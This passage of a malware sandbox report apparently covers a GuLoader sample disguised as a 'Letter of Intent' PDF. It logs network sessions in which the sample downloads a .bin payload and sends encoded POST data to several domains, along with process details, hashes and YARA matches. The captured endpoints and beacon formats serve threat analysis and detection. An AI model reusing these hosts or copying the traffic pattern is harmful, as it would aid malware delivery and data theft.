                                                                                    4 | 192.168.2.4 | 49965 | 180.178.39.235 | 80 | 2516 | C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Nov 6, 2024 20:33:44.387156963 CET | 522 | OUT | GET /tizt/?9hCtofh=qmi+mqOOYFdY+IQDoG3ujJtZIydFKoemcf68l9cfSo4s6etqUFq9dTq1GSeGSZSg4PJsoSCL3HUy+ahRuGvxi/sKjpSlqf0tlGM/91a/SP/ZaCXUGrS3HD4=&DxvPV=zbk0AVfPEjjhe HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Host: www.73613.shop
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Nov 6, 2024 20:33:45.316689968 CET | 249 | IN | HTTP/1.1 404 Not Found
                                                                                    Server: nginx/1.26.2
                                                                                    Date: Wed, 06 Nov 2024 19:33:46 GMT
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    X-Powered-By: 3.2.1
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Access-Control-Allow-Methods: PUT,POST,GET,DELETE,OPTIONS
                                                                                    Data Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    5 | 192.168.2.4 | 50001 | 203.161.49.193 | 80 | 2516 | C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Nov 6, 2024 20:33:50.573832989 CET | 793 | OUT | POST /n54u/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    Host: www.eco-tops.website
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Length: 204
                                                                                    Origin: http://www.eco-tops.website
                                                                                    Referer: http://www.eco-tops.website/n54u/
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Nov 6, 2024 20:33:51.254524946 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Wed, 06 Nov 2024 19:33:51 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    6 | 192.168.2.4 | 50009 | 203.161.49.193 | 80 | 2516 | C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Nov 6, 2024 20:33:53.125643015 CET | 813 | OUT | POST /n54u/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    Host: www.eco-tops.website
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Length: 224
                                                                                    Origin: http://www.eco-tops.website
                                                                                    Referer: http://www.eco-tops.website/n54u/
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Nov 6, 2024 20:33:53.795711994 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Wed, 06 Nov 2024 19:33:53 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    7 | 192.168.2.4 | 50010 | 203.161.49.193 | 80 | 2516 | C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Nov 6, 2024 20:33:55.671230078 CET | 10895 | OUT | POST /n54u/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    Host: www.eco-tops.website
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Length: 10304
                                                                                    Origin: http://www.eco-tops.website
                                                                                    Referer: http://www.eco-tops.website/n54u/
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Nov 6, 2024 20:33:56.352837086 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Wed, 06 Nov 2024 19:33:56 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                    8 | 192.168.2.4 | 50011 | 203.161.49.193 | 80 | 2516 | C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Nov 6, 2024 20:33:58.216128111 CET | 528 | OUT | GET /n54u/?DxvPV=zbk0AVfPEjjhe&9hCtofh=ulF5vHaDZay2Ybep6qAhk1wtxYL4m99WqdjuqGF6KuylXEStCuZI2HnnajvzLLcIwfuU3NLav5OgU7G/d2ttg6MOKAz0GZXpV5QCkBYU0gl9adu5sQ6AV2I= HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Host: www.eco-tops.website
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Nov 6, 2024 20:33:58.884802103 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Wed, 06 Nov 2024 19:33:58 GMT
                                                                                    Server: Apache
                                                                                    Content-Length: 389
                                                                                    Connection: close
                                                                                    Content-Type: text/html; charset=utf-8
                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
9 | 192.168.2.4 | 50012 | 217.160.0.132 | 80 | 2516 | C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 20:34:03.985291958 CET | 781 | OUT | POST /8u3q/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    Host: www.astrext.info
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Length: 204
                                                                                    Origin: http://www.astrext.info
                                                                                    Referer: http://www.astrext.info/8u3q/
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Data Ascii: 9hCtofh=RkQOYEjoxVItK4hlc1MY3pMR3mcGbzn4wisrdyxL41cDrgIJ9jsJSq4P/uiKdilvDqHTUZAWK/pPJ3vI8kf6Cizfn21Svbf008GRZSlvO0VAqumq8pEr9PtX33JWQ+47kBjBnIb7A+gnEmLn10e9NwsV7zlnKO8nJWO++tj01rVqzfx4E9o1r3/mD4LQu8ck1A==
Nov 6, 2024 20:34:04.811105013 CET | 780 | IN | HTTP/1.1 404 Not Found
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Date: Wed, 06 Nov 2024 19:34:04 GMT
                                                                                    Server: Apache
                                                                                    X-Frame-Options: deny
                                                                                    Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
10 | 192.168.2.4 | 50013 | 217.160.0.132 | 80 | 2516 | C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 20:34:06.607798100 CET | 801 | OUT | POST /8u3q/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    Host: www.astrext.info
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Length: 224
                                                                                    Origin: http://www.astrext.info
                                                                                    Referer: http://www.astrext.info/8u3q/
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Data Ascii: 9hCtofh=RkQOYEjoxVItLb5lbmkY8pMOr2cGRTn0wjQrd3UW4G4DoB4JvWAJRq4PqejATCl4DqasUc4WK/9PJ2fI/Tr5YSzd8m1csrf008GRZShVO0NAqeWqmMw0hftUnHJWU+43kBiknMasA9YnEn7n1le6eQsb0TkzLMhTAUXkjOXar7N0758iVMJi53bVe/Ckj/htuNhdFavjzTAQP/wIbLUAvLs=
Nov 6, 2024 20:34:07.413414955 CET | 780 | IN | HTTP/1.1 404 Not Found
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Date: Wed, 06 Nov 2024 19:34:07 GMT
                                                                                    Server: Apache
                                                                                    X-Frame-Options: deny
                                                                                    Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
11 | 192.168.2.4 | 50014 | 217.160.0.132 | 80 | 2516 | C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 20:34:09.155528069 CET | 10883 | OUT | POST /8u3q/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    Host: www.astrext.info
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Length: 10304
                                                                                    Origin: http://www.astrext.info
                                                                                    Referer: http://www.astrext.info/8u3q/
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Nov 6, 2024 20:34:10.008156061 CET | 780 | IN | HTTP/1.1 404 Not Found
                                                                                    Content-Type: text/html
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Date: Wed, 06 Nov 2024 19:34:09 GMT
                                                                                    Server: Apache
                                                                                    X-Frame-Options: deny
                                                                                    Content-Encoding: gzip


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.4 | 50015 | 217.160.0.132 | 80 | 2516 | C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 20:34:11.708276987 CET | 524 | OUT | GET /8u3q/?9hCtofh=cm4ubz77/lIwMrhjFRgV76IEwgYIQWLXxQMTOGkT00YioQcuvl4ad7FbuK2ZVTUxGoXbXPFIPc1cKkfmvUrJeif3yFVy05no8pqYeg1JIWdJs5qV9s4yrtw=&DxvPV=zbk0AVfPEjjhe HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Host: www.astrext.info
                                                                                    Connection: close
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Nov 6, 2024 20:34:12.569300890 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 1271
                                                                                    Connection: close
                                                                                    Date: Wed, 06 Nov 2024 19:34:12 GMT
                                                                                    Server: Apache
                                                                                    X-Frame-Options: deny
                                                                                    Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padding:0; border:0; outline:0; font-size:100%; vertical-align:baseline; background:transparent; } body { overflow:hidden; } </style> <meta content="NOW" name="expires"> <meta content="index, follow, all" name="GOOGLEBOT"> <meta content="index, follow, all" name="robots"> ... Following Meta-Tag fixes scaling-issues on mobile devices --> <meta content="width=device-width; initial-scale=1.0; maximum-scale=1.0; user-scalable=0;" name="viewport"> </head> <body> <div id="partner"> </div> <script type="text/javascript"> document.write( '<script type="text/javascript" language="JavaScript"' + [TRUNCATED]
Nov 6, 2024 20:34:12.569454908 CET | 203 | IN
                                                                                    Data Ascii: + window.location.host + '/' + 'IONOSParkingUK' + '/park.js">' + '<\/script>' ); </script> </body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.4 | 50016 | 216.40.34.41 | 80 | 2516 | C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 20:34:18.504647017 CET | 793 | OUT | POST /f83s/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    Host: www.newhopetoday.app
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Length: 204
                                                                                    Origin: http://www.newhopetoday.app
                                                                                    Referer: http://www.newhopetoday.app/f83s/
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Data Ascii: 9hCtofh=Yg2q5oZ/ZoKoYPeygz1koX1+tKsdpmIQrCE0XJTdbNpoPkKZofPi/i8oEfb5X76fTHedDucVp5KOD9vU4E3WJ4ZKC8nLq7RVG4yH+rBVLwthElP3w5ct6U4TgqZIp2oWuCXPqoOMxkBzLCNXN0oY7G+dkxdbeSpoan7KZsuk3G69dYPkyZEPrsGHx7zjBphIiw==
Nov 6, 2024 20:34:19.192116976 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                    content-type: text/html; charset=UTF-8
                                                                                    x-request-id: 820f1639-7703-49a9-b928-7b8dd944ccdb
                                                                                    x-runtime: 0.020687
                                                                                    content-length: 17134
                                                                                    connection: close
                                                                                    Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /> <title>Action Controller: Exception caught</title> <style> body { background-color: #FAFAFA; color: #333; margin: 0px; } body, p, ol, ul, td { font-family: helvetica, verdana, arial, sans-serif; font-size: 13px; line-height: 18px; } pre { font-size: 11px; white-space: pre-wrap; } pre.box { border: 1px solid #EEE; padding: 10px; margin: 0px; width: 958px; } header { color: #F0F0F0; background: #C52F24; padding: 0.5em 1.5em; } h1 { margin: 0.2em 0; line-height: 1.1em; font-size: 2em; } h2 { color: #C52F24; line-height: 25px; } .details { border: 1px solid #D0D0D0; border-radius: 4px; margin: 1em 0px; display: block; width: 978px; } .summary { padding: 8px 15px; border-bottom: 1px solid #D0D0D0; [TRUNCATED]
Nov 6, 2024 20:34:19.192135096 CET | 212 | IN
                                                                                    Data Ascii: pre { margin: 5px; border: none; } #container { box-sizing: border-box; width: 100%; padding: 0 1.5em; } .source * { margin: 0px; padding: 0px; }
Nov 6, 2024 20:34:19.192169905 CET | 1236 | IN
                                                                                    Data Ascii: .source { border: 1px solid #D9D9D9; background: #ECECEC; width: 978px; } .source pre { padding: 10px 0px; border: none; } .source .data { font-size: 80%; overflow: auto; bac
Nov 6, 2024 20:34:19.192275047 CET | 1236 | IN
                                                                                    Data Ascii: it-appearance: textfield; } #route_table tbody tr { border-bottom: 1px solid #ddd; } #route_table tbody tr:nth-child(odd) { background: #f2f2f2; } #route_table tbody.exact_matches, #route_table tbody.fuzzy_matches {
Nov 6, 2024 20:34:19.192287922 CET | 424 | IN
                                                                                    Data Ascii: Error</h1></header><div id="container"> <h2>No route matches [POST] &quot;/f83s&quot;</h2> <p><code>Rails.root: /hover-parked</code></p><div id="traces"> <a href="#" onclick="hide(&#39;Framework-Trace&#39;);hide(&#39;Full-Trace&#
Nov 6, 2024 20:34:19.192414045 CET | 1236 | IN
                                                                                    Data Ascii: work-Trace&#39;);; return false;">Framework Trace</a> | <a href="#" onclick="hide(&#39;Application-Trace&#39;);hide(&#39;Framework-Trace&#39;);show(&#39;Full-Trace&#39;);; return false;">Full Trace</a> <div id="Application-Trace" sty
Nov 6, 2024 20:34:19.192425013 CET | 212 | IN
                                                                                    Data Ascii: ctionpack (5.2.6) lib/action_dispatch/middleware/request_id.rb:27:in `call&#39;</a><br><a class="trace-frames" data-frame-id="7" href="#">rack (2.2.3) lib/rack/method_override.rb:24:in `call&#39;</a><br><a class=
                                                                                    Nov 6, 2024 20:34:19.192436934 CET1236INData Raw: 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 38 22 20 68 72 65 66 3d 22 23 22 3e 72 61 63 6b 20 28 32 2e 32 2e 33 29 20 6c 69 62 2f 72 61 63 6b 2f 72 75 6e 74 69 6d 65 2e 72 62 3a 32 32 3a 69 6e 20 60
                                                                                    Data Ascii: "trace-frames" data-frame-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache/strategy/local_cache_middleware.rb:29:in `call
                                                                                    Nov 6, 2024 20:34:19.192624092 CET1236INData Raw: 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 38 22 20 68 72 65 66 3d 22 23 22 3e 70 75 6d 61 20 28 34 2e 33 2e 39 29 20 6c 69 62 2f 70 75 6d 61 2f 74 68 72 65 61 64 5f 70 6f 6f 6c 2e 72 62 3a 31 33
                                                                                    Data Ascii: "trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre> </div> <div id="Full-Trace" style="display: none;"> <pre><code><a class="trace-frames" data-f
                                                                                    Nov 6, 2024 20:34:19.192636013 CET1236INData Raw: 64 5f 6f 76 65 72 72 69 64 65 2e 72 62 3a 32 34 3a 69 6e 20 60 63 61 6c 6c 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 38 22 20 68 72
                                                                                    Data Ascii: d_override.rb:24:in `call&#39;</a><br><a class="trace-frames" data-frame-id="8" href="#">rack (2.2.3) lib/rack/runtime.rb:22:in `call&#39;</a><br><a class="trace-frames" data-frame-id="9" href="#">activesupport (5.2.6) lib/active_support/cache
                                                                                    Nov 6, 2024 20:34:19.197045088 CET1236INData Raw: 72 2e 72 62 3a 33 32 38 3a 69 6e 20 60 62 6c 6f 63 6b 20 69 6e 20 72 75 6e 26 23 33 39 3b 3c 2f 61 3e 3c 62 72 3e 3c 61 20 63 6c 61 73 73 3d 22 74 72 61 63 65 2d 66 72 61 6d 65 73 22 20 64 61 74 61 2d 66 72 61 6d 65 2d 69 64 3d 22 31 38 22 20 68
                                                                                    Data Ascii: r.rb:328:in `block in run&#39;</a><br><a class="trace-frames" data-frame-id="18" href="#">puma (4.3.9) lib/puma/thread_pool.rb:134:in `block in spawn_thread&#39;</a><br></code></pre> </div> <script type="text/javascript"> var traceF


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.4 | 50017 | 216.40.34.41 | 80 | 2516 | C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 20:34:21.293756008 CET | 813 | OUT | POST /f83s/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    Host: www.newhopetoday.app
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Length: 224
                                                                                    Origin: http://www.newhopetoday.app
                                                                                    Referer: http://www.newhopetoday.app/f83s/
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
                                                                                    Data Ascii: 9hCtofh=Yg2q5oZ/ZoKoefuyv0pkt319p6sdgGIUrCY0XMrNb75oMBuZvaji4i8oQvb8Ir6WTHizDqUVp62OD4rU413XIoZMbsnJkbRVG4yH+rVzLwlhEWX3zYdfkE4SnqZIiWoauCXtqpi2xn5zLHxXKhEf12+fqRcTQhUwSF22ROGC3EmQYeC+jolY5si0s86XMqcB5x/EoXfGokXWh+zmKQ/z2gA=
Nov 6, 2024 20:34:21.978986025 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                    content-type: text/html; charset=UTF-8
                                                                                    x-request-id: cf5e617c-69d7-4f8d-a09a-87f3e3aab378
                                                                                    x-runtime: 0.021751
                                                                                    content-length: 17154
                                                                                    connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.4 | 50018 | 216.40.34.41 | 80 | 2516 | C:\Program Files (x86)\qYihYtHSzTyYjCAUeXJruHUbgshJoCTdDBbTOhVAXcRjRRsVUtWCgPJqTEAQuVatmaHDCtplZTyi\ybjXXpYwhPHZD.exe
Timestamp | Bytes transferred | Direction | Data
Nov 6, 2024 20:34:23.847713947 CET | 10895 | OUT | POST /f83s/ HTTP/1.1
                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                    Accept-Language: en-US
                                                                                    Accept-Encoding: gzip, deflate
                                                                                    Host: www.newhopetoday.app
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    Connection: close
                                                                                    Cache-Control: max-age=0
                                                                                    Content-Length: 10304
                                                                                    Origin: http://www.newhopetoday.app
                                                                                    Referer: http://www.newhopetoday.app/f83s/
                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 5.0; SM-G900R4 Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Data Ascii: 9hCtofh=[TRUNCATED]
Nov 6, 2024 20:34:24.595210075 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                    content-type: text/html; charset=UTF-8
                                                                                    x-request-id: d5e43bac-84e2-4431-93f6-27b896edd65c
                                                                                    x-runtime: 0.035128
                                                                                    content-length: 27234
                                                                                    connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49735 | 69.27.100.185 | 443 | 1220 | C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-06 19:32:37 UTC | 200 | OUT | GET /quarantin/luiKzhysatQzs26.bin HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                                                    Host: www.evolutioncosmetics.com
                                                                                    Cache-Control: no-cache
2024-11-06 19:32:37 UTC | 222 | IN | HTTP/1.1 200 OK
                                                                                    Server: nginx
                                                                                    Date: Wed, 06 Nov 2024 19:32:35 GMT
                                                                                    Content-Type: application/octet-stream
                                                                                    Content-Length: 288320
                                                                                    Connection: close
                                                                                    Last-Modified: Sun, 03 Nov 2024 17:24:16 GMT
                                                                                    Accept-Ranges: bytes



                                                                                    Target ID:0
                                                                                    Start time:14:32:17
                                                                                    Start date:06/11/2024
                                                                                    Path:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"
                                                                                    Imagebase:0x400000
                                                                                    File size:872'244 bytes
                                                                                    MD5 hash:629BE165860D2336755DE85467756639
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.1950807727.0000000004D63000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:2
                                                                                    Start time:14:32:27
                                                                                    Start date:06/11/2024
                                                                                    Path:C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe
                                                                                    Wow64 process (32bit):true
                                                                                    Commandline:"C:\Users\user\Desktop\Letter of Intent (LOI) For the Company November 2024 PDF.pif.exe"
                                                                                    Imagebase:0x400000
